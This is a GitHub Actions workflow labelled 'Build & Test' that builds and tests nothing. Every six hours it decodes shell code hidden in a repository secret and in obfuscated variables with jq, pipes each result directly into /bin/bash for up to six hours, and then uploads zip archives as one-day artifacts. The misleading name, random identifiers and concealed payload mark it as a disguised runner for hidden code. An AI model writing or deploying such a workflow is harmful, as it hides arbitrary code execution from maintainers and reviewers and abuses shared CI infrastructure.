name: Build & Test
on:
  workflow_dispatch:

  schedule:
    - cron: '25 1,7,13,19 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  service:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run
        env:
          wx33460: ${{ secrets.wx33460 }}
        run: |
          printf '%s' "$wx33460" | jq -r .jmhiv240 | /bin/bash
          echo $al77 | jq -r .kd313 | /bin/bash
          printf '%s' "$ihb6" | jq -r .hwqf53 | /bin/bash
          echo $el7397 | jq -r .gzjws48 | /bin/bash
          echo $h5881 | jq -r .qmtj6824 | /bin/bash

      - name: Save archive
        uses: actions/upload-artifact@v4
        with:
          name: t1HxSs0W
          path: "*.zip"
          retention-days: 1
